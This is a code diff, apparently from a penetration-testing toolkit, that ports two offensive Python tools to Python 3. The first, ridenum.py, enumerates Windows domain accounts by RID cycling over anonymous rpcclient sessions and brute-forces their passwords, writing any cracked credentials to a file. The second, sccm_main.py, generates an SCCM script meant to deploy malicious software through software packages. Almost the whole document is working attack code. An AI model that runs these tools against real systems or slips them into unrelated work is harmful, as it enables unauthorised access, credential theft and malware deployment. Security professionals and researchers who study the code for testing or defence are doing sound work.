if not os.path.isfile(passwords):
print("[!] File was not found. Please try a path again.")
sys.exit()
if len(sys.argv) > 5:
userlist = sys.argv[5]
if not os.path.isfile(userlist):
print("[!] File was not found. Please try a path again.")
sys.exit()
# check for python pexpect
try:
import pexpect
# if we don't have it
except ImportError:
print("[!] Sorry boss, python-pexpect is not installed. You need to install this first.")
sys.exit()
# if userlist is being used versus rid enum, then skip all of this
if not userlist:
print("[*] Attempting lsaquery first...This will enumerate the base domain SID")
# call the check_user_lsa function and check to see if we can find base
# SID guid
sid = check_user_lsa(ip)
# if lsa enumeration was successful then don't do
if sid:
sid = sid.replace(
"WARNING: Ignoring invalid value 'share' for parameter 'security'", "")
print("[*] Successfully enumerated base domain SID. Printing information: \n" + sid.rstrip())
print("[*] Moving on to extract via RID cycling attack.. ")
# format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
# if we weren't successful on lsaquery
else:
print("[!] Unable to enumerate through lsaquery, trying default account names..")
accounts = ("administrator", "guest", "krbtgt", "root")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if not sid:
print("[!] Failed using account name: %s...Attempting another." % account)
else:
# success! Break out of the loop
print("[*] Successfully enumerated SID account.. Moving on to extract via RID.\n")
break
# if we found one
if sid != False:
# pulling the exact domain SID out
sid = sid.split(" ")
# pull first in tuple
sid = sid[1]
# remove the RID number
sid = sid[:-4]
# we has no sids :( exiting
if sid == False:
denied = 1
print("[!] Failed to enumerate SIDs, pushing on to another method.")
print("[*] Enumerating user accounts.. This could take a little while.")
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
# this is where we write out our output
if os.path.isfile("%s_users.txt" % ip):
# remove old file
os.remove("%s_users.txt" % ip)
filewrite = open("%s_users.txt" % ip, "a")
# cycle through rid and enumerate the domain
sid_names = sids_to_names(ip, sid, rid_start, rid_stop)
if sid_names:
for name in sid_names:
# print the sid
print("Account name: " + name)
# write the file out
filewrite.write(name + "\n")
# close the file
filewrite.close()
if denied == 0:
print("[*] RID_ENUM has finished enumerating user accounts...")
# if we failed all other methods, we'll move to enumdomusers
if denied == 1:
print("[*] Attempting enumdomusers to enumerate users...")
proc = subprocess.Popen("rpcclient -U '' -N %s -c 'enumdomusers'" %
(ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
filewrite = open("%s_users.txt" % ip, "a")
counter = 0
for line in iter(proc.stdout.readline, ''):
counter = 1
if line != '':
if "user:" in line:
# cycle through
line = line.split("rid:")
line = line[0].replace("user:[", "").replace("]", "")
print(line)
filewrite.write(line + "\n")
else:
denied = 2
break
else:
if counter == 0:
break
# if we had nothing to pull
if counter == 0:
denied = 2
if denied == 2:
print("[!] Sorry. RID_ENUM failed to successfully enumerate users. Bummers.")
if denied == 1:
filewrite.close()
print("[*] Finished dumping users, saved to %s_users.txt." % (ip))
# if we specified a password list
if passwords:
# our password file
passfile = open(passwords, "r").readlines()
userfile = ""
# if userlist was specified
if userlist:
# use the userlist specified
userfile = open(userlist, "r").readlines()
# our list of users
else:
userfile = open("%s_users.txt" % ip, "r").readlines()
# cycle through username first
for user in userfile:
filewrite = open("%s_success_results.txt" % ip, "a")
user = user.rstrip()
user_fixed = user.replace("\\", "\\\\").replace("'", "")
# if the user isn't blank
if user:
for password in passfile:
password = password.rstrip()
# if we specify a lowercase username
if password == "lc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.lower()
# if domain isn't specified
else:
password = user.lower()
except:
pass
# if we specify a uppercase username
if password == "uc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.upper()
else:
password = user.lower()
except:
pass
if password != "":
child = pexpect.spawn(
"rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
# if we are using a blank password
if password == "":
child = pexpect.spawn(
"rpcclient -U '%s' -N %s" % (user_fixed, ip))
i = child.expect(['LOGON_FAILURE', 'rpcclient', 'NT_STATUS_ACCOUNT_EXPIRED',
'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_PASSWORD_MUST_CHANGE', 'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED', 'NT_STATUS_BAD_NETWORK_NAME', 'NT_STATUS_CONNECTION_REFUSED', 'NT_STATUS_PASSWORD_EXPIRED', 'NT_STATUS_NETWORK_UNREACHABLE'])
# login failed for this one
if i == 0:
if "\\" in password:
password = password.split("\\")[1]
print("Failed guessing username of %s and password of %s" % (user, password))
child.kill(0)
# if successful
if i == 1:
print("[*] Successfully guessed username: %s with password of: %s" % (user, password))
filewrite.write(
"username: %s password: %s\n" % (user, password))
success = True
filewrite.close()
child.kill(0)
# if account expired
if i == 2:
print("[-] Successfully guessed username: %s with password of: %s however, it is set to expired." % (user, password))
filewrite.write(
"username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
# if account is locked out
if i == 3:
print("[!] Careful. Received a NT_STATUS_ACCOUNT_LOCKED_OUT was detected.. \
You may be locking accounts out!")
child.kill(0)
# if account change is needed
if i == 4:
print("[*] Successfully guessed password but needs changed. Username: %s with password of: %s" % (user, password))
filewrite.write(
"CHANGE PASSWORD NEEDED - username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
# if account is disabled
if i == 5:
print("[*] Account is disabled: %s with password of: %s" % (user, password))
filewrite.write(
"ACCOUNT DISABLED: %s PW: %s\n" % (user, password))
success = True
child.kill(0)
if i == 8 or i == 9:
print("[!] Unable to connect to the server. Try again or check networking settings.")
print("[!] Exiting RIDENUM...")
success = False
sys.exit()
# if successful
if i == 9:
print("[*] Successfully guessed username: %s with password of (NOTE IT IS EXPIRED!): %s" % (user, password))
filewrite.write(
"username: %s password: %s (password expired)\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
filewrite.close()
# if we got lucky
if success:
print("[*] We got some accounts, exported results to %s_success_results_txt" % ip)
print("[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % ip)
# if we weren't successful
else:
print("\n[!] Unable to brute force a user account, sorry boss.")
# exit out after we are finished
sys.exit()
# except keyboard interrupt
except KeyboardInterrupt:
print("[*] Okay, Okay... Exiting... Thanks for using rid_enum.py")

377
src/fasttrack/ridenum.py
View file

@ -1,7 +1,18 @@
#!/usr/bin/python
import subprocess
# coding=utf-8
import os
import subprocess
import sys
# check for python pexpect
try:
import pexpect
# if we don't have it
except ImportError:
print("[!] Sorry boss, python-pexpect is not installed. You need to install this first.")
sys.exit()
#############################################################################################################
#
# RID Enum
@ -21,7 +32,7 @@ import sys
def usage():
print """
print("""
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
@ -41,23 +52,24 @@ automatically attempt to brute force the user accounts when its finished enumera
- RID_ENUM is open source and uses all standard python libraries minus python-pexpect. -
You can also specify an already dumped username file, it needs to be in the DOMAINNAME\USERNAME
You can also specify an already dumped username file, it needs to be in the DOMAINNAME\\USERNAME
format.
Example: ./ridenum.py 192.168.1.50 500 50000 /root/dict.txt
Usage: ./ridenum.py <server_ip> <start_rid> <end_rid> <optional_password_file> <optional_username_filename>
"""
""")
sys.exit()
# for nt-status-denied
denied = 0
# attempt to use lsa query first
def check_user_lsa(ip):
# pull the domain via lsaenum
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lsaquery"' % ip, stdout=subprocess.PIPE,
shell=True)
proc = subprocess.Popen('rpcclient -U "" {0} -N -c "lsaquery"'.format(ip), stdout=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
# if the user wasn't found, return a False
if not "Domain Sid" in stdout_value:
@ -65,13 +77,18 @@ def check_user_lsa(ip):
else:
return stdout_value
# attempt to lookup an account via rpcclient
def check_user(ip, account):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupnames %s"' % (ip, account), stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
proc = subprocess.Popen('rpcclient -U "" {0} -N -c "lookupnames {1}"'.format(ip, account),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
stdout_value = proc.communicate()[0]
# if the user wasn't found, return a False
if "NT_STATUS_NONE_MAPPED" or "NT_STATUS_CONNECTION_REFUSED" or "NT_STATUS_ACCESS_DENIED" in stdout_value:
bad_statuses = ["NT_STATUS_NONE_MAPPED", "NT_STATUS_CONNECTION_REFUSED", "NT_STATUS_ACCESS_DENIED"]
if any(x in stdout_value for x in bad_statuses):
return False
else:
return stdout_value
@ -80,34 +97,34 @@ def check_user(ip, account):
# helper function to break a list up into smaller lists
def chunk(l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
yield l[i:i + n]
# this will do a conversion to find the account name based on rid
# looks up multiple sid-rids at a time provided a range
def sids_to_names(ip, sid, start, stop):
rid_accounts = []
ranges = ['%s-%s' % (sid, rid) for rid in range(start, stop)]
ranges = ['{0}-{1}'.format(sid, rid) for rid in range(start, stop)]
# different chunk size for darwin (os x)
chunk_size = 2500
if sys.platform == 'darwin':
chunk_size = 5000
chunks = list(chunk(ranges, chunk_size))
for c in chunks:
command = 'rpcclient -U "" %s -N -c "lookupsids ' % ip
command = 'rpcclient -U "" {0} -N -c "lookupsids '.format(ip)
command += ' '.join(c)
command += '"'
proc = subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
if "NT_STATUS_ACCESS_DENIED" in stdout_value:
print "[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users."
print("[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.")
global denied
denied = 1
break
for line in stdout_value.rstrip().split('\n'):
if not "*unknown*" in line:
if "*unknown*" not in line:
if line != "":
rid_account = line.split(" ", 1)[1]
# will show during an unhandled request
@ -121,8 +138,10 @@ def sids_to_names(ip, sid, start, stop):
rid_accounts.append(rid_account)
return rid_accounts
# capture initial input
success = False
sid = None
try:
if len(sys.argv) < 4:
usage()
@ -138,92 +157,81 @@ try:
passwords = sys.argv[4]
# if its not there then bomb out
if not os.path.isfile(passwords):
print "[!] File was not found. Please try a path again."
print("[!] File was not found. Please try a path again.")
sys.exit()
if len(sys.argv) > 5:
userlist = sys.argv[5]
if not os.path.isfile(userlist):
print "[!] File was not found. Please try a path again."
print("[!] File was not found. Please try a path again.")
sys.exit()
# check for python pexpect
try:
import pexpect
# if we don't have it
except ImportError:
print "[!] Sorry boss, python-pexpect is not installed. You need to install this first."
sys.exit()
# if userlist is being used versus rid enum, then skip all of this
if not userlist:
print "[*] Attempting lsaquery first...This will enumerate the base domain SID"
print("[*] Attempting lsaquery first...This will enumerate the base domain SID")
# call the check_user_lsa function and check to see if we can find base SID guid
sid = check_user_lsa(ip)
# if lsa enumeration was successful then don't do
if sid:
sid = sid.replace("WARNING: Ignoring invalid value 'share' for parameter 'security'", "")
print "[*] Successfully enumerated base domain SID. Printing information: \n" + sid.rstrip()
print "[*] Moving on to extract via RID cycling attack.. "
# format it properly
sid = sid.replace("WARNING: Ignoring invalid value 'share' for parameter 'security'", "")
print("[*] Successfully enumerated base domain SID. Printing information: \n" + sid.rstrip())
print("[*] Moving on to extract via RID cycling attack.. ") # format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
# if we weren't successful on lsaquery
# if we weren't successful on lsaquery
else:
print("[!] Unable to enumerate through lsaquery, trying default account names..")
accounts = ("administrator", "guest", "krbtgt", "root")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if not sid:
print("[!] Failed using account name: {0}...Attempting another.".format(account))
else:
# success! Break out of the loop
print("[*] Successfully enumerated SID account.. Moving on to extract via RID.\n")
break
# if we found one
if sid:
# pulling the exact domain SID out
sid = sid.split(" ")
# pull first in tuple
sid = sid[1]
# remove the RID number
sid = sid[:-4]
# we has no sids :( exiting
else:
print "[!] Unable to enumerate through lsaquery, trying default account names.."
accounts = ("administrator", "guest", "krbtgt", "root")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if not sid:
print "[!] Failed using account name: %s...Attempting another." % account
else:
# success! Break out of the loop
print "[*] Successfully enumerated SID account.. Moving on to extract via RID.\n"
break
# if we found one
if sid != False:
# pulling the exact domain SID out
sid = sid.split(" ")
# pull first in tuple
sid = sid[1]
# remove the RID number
sid = sid[:-4]
# we has no sids :( exiting
if sid == False:
denied = 1
print "[!] Failed to enumerate SIDs, pushing on to another method."
denied = 1
print("[!] Failed to enumerate SIDs, pushing on to another method.")
print "[*] Enumerating user accounts.. This could take a little while."
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
# this is where we write out our output
if os.path.isfile("%s_users.txt" % ip):
# remove old file
os.remove("%s_users.txt" % ip)
filewrite = file("%s_users.txt" % ip, "a")
print("[*] Enumerating user accounts.. This could take a little while.")
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
# this is where we write out our output
if os.path.isfile("{0}_users.txt".format(ip)):
# remove old file
os.remove("{0}_users.txt".format(ip))
with open("{0}_users.txt".format(ip), "a") as filewrite:
# cycle through rid and enumerate the domain
sid_names = sids_to_names(ip, sid, rid_start, rid_stop)
if sid_names:
for name in sid_names:
# print the sid
print "Account name: " + name
print("Account name: {0}".format(name))
# write the file out
filewrite.write(name + "\n")
# close the file
filewrite.close()
if denied == 0:
print "[*] RID_ENUM has finished enumerating user accounts..."
# if we failed all other methods, we'll move to enumdomusers
if denied == 1:
print "[*] Attempting enumdomusers to enumerate users..."
proc = subprocess.Popen("rpcclient -U '' -N %s -c 'enumdomusers'" % (ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
filewrite = file("%s_users.txt" % ip, "a")
if denied == 0:
print("[*] RID_ENUM has finished enumerating user accounts...")
# if we failed all other methods, we'll move to enumdomusers
if denied == 1:
print("[*] Attempting enumdomusers to enumerate users...")
proc = subprocess.Popen("rpcclient -U '' -N {0} -c 'enumdomusers'".format(ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
with open("{0}_users.txt".format(ip), "a") as filewrite:
counter = 0
for line in iter(proc.stdout.readline, ''):
counter = 1
@ -232,7 +240,7 @@ try:
# cycle through
line = line.split("rid:")
line = line[0].replace("user:[", "").replace("]", "")
print line
print(line)
filewrite.write(line + "\n")
else:
denied = 2
@ -241,139 +249,136 @@ try:
if counter == 0:
break
# if we had nothing to pull
if counter == 0:
denied = 2
# if we had nothing to pull
if counter == 0:
denied = 2
if denied == 2:
print "[!] Sorry. RID_ENUM failed to successfully enumerate users. Bummers."
if denied == 2:
print("[!] Sorry. RID_ENUM failed to successfully enumerate users. Bummers.")
if denied == 1:
filewrite.close()
print "[*] Finished dumping users, saved to %s_users.txt." % (ip)
if denied == 1:
print("[*] Finished dumping users, saved to {0}_users.txt.".format(ip))
# if we specified a password list
if passwords:
# our password file
passfile = file(passwords, "r").readlines()
userfile = ""
# if userlist was specified
if userlist:
# use the userlist specified
userfile = file(userlist, "r").readlines()
# our list of users
else:
userfile = file("%s_users.txt" % ip, "r").readlines()
with open(passwords) as fileopen:
passfile = fileopen.readlines()
# if userlist was specified use the userlist specified
if not userlist:
# our list of users
userlist = "{0}_users.txt".format(ip)
with open(userlist) as fileopen:
userfile = fileopen.readlines()
# cycle through username first
for user in userfile:
filewrite = file("%s_success_results.txt" % ip, "a")
user = user.rstrip()
user_fixed = user.replace("\\", "\\\\").replace("'", "")
with open("{0}_success_results.txt".format(ip), "a") as filewrite:
user = user.rstrip()
user_fixed = user.replace("\\", "\\\\").replace("'", "")
# if the user isn't blank
if user:
for password in passfile:
password = password.rstrip()
# if we specify a lowercase username
if password == "lc username":
try:
# if the user isn't blank
if user:
for password in passfile:
password = password.rstrip()
# if we specify a lowercase username
if password == "lc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.lower()
# if domain isn't specified
else:
password = user.lower()
except:
pass
# if we specify a uppercase username
if password == "uc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.upper()
else:
password = user.lower()
except:
pass
if password != "":
child = pexpect.spawn("rpcclient -U '{0}%{1}' {2}".format(user_fixed, password, ip))
# if we are using a blank password
if password == "":
child = pexpect.spawn("rpcclient -U '{0}' -N {1}".format(user_fixed, ip))
i = child.expect(['LOGON_FAILURE', 'rpcclient', 'NT_STATUS_ACCOUNT_EXPIRED',
'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_PASSWORD_MUST_CHANGE',
'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED',
'NT_STATUS_BAD_NETWORK_NAME', 'NT_STATUS_CONNECTION_REFUSED',
'NT_STATUS_PASSWORD_EXPIRED', 'NT_STATUS_NETWORK_UNREACHABLE'])
# login failed for this one
if i == 0:
if "\\" in password:
password = user.split("\\")[1]
password = password.lower()
# if domain isn't specified
else: password = user.lower()
except: pass
# if we specify a uppercase username
if password == "uc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.upper()
else: password = user.lower()
except: pass
if password != "":
child = pexpect.spawn("rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
# if we are using a blank password
if password == "":
child = pexpect.spawn("rpcclient -U '%s' -N %s" % (user_fixed, ip))
password = password.split("\\")[1]
print("Failed guessing username of {0} and password of {1}".format(user, password))
child.kill(0)
i = child.expect(['LOGON_FAILURE', 'rpcclient', 'NT_STATUS_ACCOUNT_EXPIRED',
'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_PASSWORD_MUST_CHANGE', 'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED', 'NT_STATUS_BAD_NETWORK_NAME', 'NT_STATUS_CONNECTION_REFUSED', 'NT_STATUS_PASSWORD_EXPIRED', 'NT_STATUS_NETWORK_UNREACHABLE'])
# if successful
if i == 1:
print("[*] Successfully guessed username: {0} with password of: {1}".format(user, password))
filewrite.write("username: {0} password: {1}\n".format(user, password))
success = True
child.kill(0)
# if account expired
if i == 2:
print("[-] Successfully guessed username: {0} with password of: {1} however, it is set to expired.".format(user, password))
filewrite.write("username: {0} password: {1}\n".format(user, password))
success = True
child.kill(0)
# login failed for this one
if i == 0:
if "\\" in password:
password = password.split("\\")[1]
print "Failed guessing username of %s and password of %s" % (user, password)
child.kill(0)
# if account is locked out
if i == 3:
print("[!] Careful. Received a NT_STATUS_ACCOUNT_LOCKED_OUT was detected.. \
You may be locking accounts out!")
child.kill(0)
# if successful
if i == 1:
print "[*] Successfully guessed username: %s with password of: %s" % (user, password)
filewrite.write("username: %s password: %s\n" % (user, password))
success = True
filewrite.close()
child.kill(0)
# if account change is needed
if i == 4:
print("[*] Successfully guessed password but needs changed. Username: {0} with password of: {1}".format(user, password))
filewrite.write("CHANGE PASSWORD NEEDED - username: {0} password: {1}\n".format(user, password))
success = True
child.kill(0)
# if account expired
if i == 2:
print "[-] Successfully guessed username: %s with password of: %s however, it is set to expired." % (user, password)
filewrite.write("username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
# if account is disabled
if i == 5:
print("[*] Account is disabled: {0} with password of: {1}".format(user, password))
filewrite.write("ACCOUNT DISABLED: {0} PW: {1}\n".format(user, password))
success = True
child.kill(0)
# if account is locked out
if i == 3:
print "[!] Careful. Received a NT_STATUS_ACCOUNT_LOCKED_OUT was detected.. \
You may be locking accounts out!"
child.kill(0)
if i == 8 or i == 9:
print("[!] Unable to connect to the server. Try again or check networking settings.")
print("[!] Exiting RIDENUM...")
success = False
sys.exit()
# if account change is needed
if i == 4:
print "[*] Successfully guessed password but needs changed. Username: %s with password of: %s" % (user,password)
filewrite.write("CHANGE PASSWORD NEEDED - username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
# if successful
if i == 9:
print("[*] Successfully guessed username: {0} with password of (NOTE IT IS EXPIRED!): {1}".format(user, password))
filewrite.write("username: {0} password: {1} (password expired)\n".format(user, password))
success = True
child.kill(0)
# if account is disabled
if i == 5:
print "[*] Account is disabled: %s with password of: %s" % (user, password)
filewrite.write("ACCOUNT DISABLED: %s PW: %s\n" % (user,password))
success = True
child.kill(0)
if i ==8 or i == 9:
print "[!] Unable to connect to the server. Try again or check networking settings."
print "[!] Exiting RIDENUM..."
success = False
sys.exit()
# if successful
if i == 9:
print "[*] Successfully guessed username: %s with password of (NOTE IT IS EXPIRED!): %s" % (user, password)
filewrite.write("username: %s password: %s (password expired)\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
filewrite.close()
# if we got lucky
if success:
print "[*] We got some accounts, exported results to %s_success_results_txt" % ip
print "[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % ip
print("[*] We got some accounts, exported results to {0}_success_results_txt".format(ip))
print("[*] All accounts extracted via RID cycling have been exported to {0}_users.txt".format(ip))
# if we weren't successful
else:
print "\n[!] Unable to brute force a user account, sorry boss."
print("\n[!] Unable to brute force a user account, sorry boss.")
# exit out after we are finished
sys.exit()
# except keyboard interrupt
# exit out after we are finished
sys.exit() # except keyboard interrupt
except KeyboardInterrupt:
print "[*] Okay, Okay... Exiting... Thanks for using ridenum.py"
print("[*] Okay, Okay... Exiting... Thanks for using ridenum.py")

1
src/fasttrack/sccm/__init__.py
View file

@ -0,0 +1 @@
# coding=utf-8

44
src/fasttrack/sccm/sccm_main.py
View file

@ -1,18 +1,33 @@
#!/usr/bin/python
from src.core.setcore import *
print("The" + bcolors.BOLD + " SCCM Attack Vector " + bcolors.ENDC + "will utilize the SCCM configurations to deploy malicious software. \n\nYou need to have the SMSServer name and a PackageID you want to package on the website. Then you need to copy this configuration file to the startup directory for all of the users on the server.")
# coding=utf-8
import os
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("The" + core.bcolors.BOLD + " SCCM Attack Vector " + core.bcolors.ENDC +
"will utilize the SCCM configurations to deploy malicious software. \n\n"
"You need to have the SMSServer name and a PackageID you want to package "
"on the website. Then you need to copy this configuration file to the "
"startup directory for all of the users on the server.")
sms_server = input("Enter the IP address or hostname of the SMS Server: ")
package_id = input(
"Enter the Package ID of the package you want to patch: ")
package_id = input("Enter the Package ID of the package you want to patch: ")
configuration = '''
# configuration file written by Dave DeSimone and Bill Readshaw
# attack vector presented at Defcon 20
# added to set 07/27/2012
strSMSServer = "%s"
strPackageID = "%s"
strSMSServer = "{0}"
strPackageID = "{1}"
Set objLoc = CreateObject("WbemScripting.SWbemLocator")
Set objSMS= objLoc.ConnectServer(strSMSServer, "root\sms")
@ -30,15 +45,12 @@ Set objPkgs = objSMS2.ExecQuery("select * from SMS_Package where PackageID = '"
for each objPkg in objPkgs
objPkg.RefreshPkgSource(0)
Next
''' % (sms_server, package_id)
'''.format(sms_server, package_id)
# write out the file to reports
filewrite = open(setdir + "/reports/sccm_configuration.txt", "w")
filewrite.write(configuration)
filewrite.close()
print_status("The SCCM configuration script has been successfully created.")
print_status("You need to copy the script to the startup folder of the server.")
print_status(
"Report has been exported to %s/reports/sccm_configuration.txt" % (definepath))
pause = input("Press " + bcolors.RED +
"{return} " + bcolors.ENDC + "to exit this menu.")
with open(os.path.join(core.setdir, "reports/sccm_configuration.txt"), 'w') as filewrite:
filewrite.write(configuration)
core.print_status("The SCCM configuration script has been successfully created.")
core.print_status("You need to copy the script to the startup folder of the server.")
core.print_status("Report has been exported to {0}".format(os.path.join(core.definepath, "reports/sccm_configuration.txt")))
pause = input("Press " + core.bcolors.RED + "{return} " + core.bcolors.ENDC + "to exit this menu.")